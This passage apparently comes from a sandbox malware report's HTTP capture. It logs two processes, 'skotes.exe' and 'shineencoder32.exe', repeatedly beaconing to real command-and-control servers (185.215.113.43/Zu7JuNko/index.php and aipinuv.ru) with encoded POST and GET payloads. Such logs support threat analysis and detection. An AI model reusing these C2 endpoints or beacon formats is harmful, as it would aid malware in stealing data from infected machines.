Nov 15, 2024 14:12:33.019166946 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:33.946449041 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50243	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:33.066817045 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:34.015284061 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50245	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:34.154531956 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:35.134835005 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50248	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:35.267733097 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:36.268971920 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50249	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:35.473253965 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:36.419354916 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50250	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:36.396286964 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:37.353857994 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50253	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:37.482398033 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:38.443686962 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50255	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:38.041404009 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:38.978626966 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50256	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:38.585086107 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:39.627650976 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50257	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:39.842427969 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:40.790050983 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50258	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:40.502772093 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:41.529336929 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50259	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:40.919657946 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:41.917234898 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50260	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:42.038126945 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:42.959774971 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50261	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:43.094044924 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:43.990643024 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	50262	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:43.152009010 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:44.054940939 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	50263	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:44.110666990 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:45.022289991 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	50264	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:45.156580925 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:46.120311975 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	50265	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:45.573875904 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:46.510762930 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	50266	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:46.241652012 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:47.215353966 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	50267	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:47.357331991 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:48.275950909 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	50268	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:48.127774000 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:12:49.041186094 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	50271	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:48.403697968 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:49.341242075 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	50272	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:49.487292051 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:50.405244112 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	50273	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:50.536449909 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:12:51.464065075 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	50274	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:12:50.564462900 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:12:51.454072952 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	142.250.185.68	443	7228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
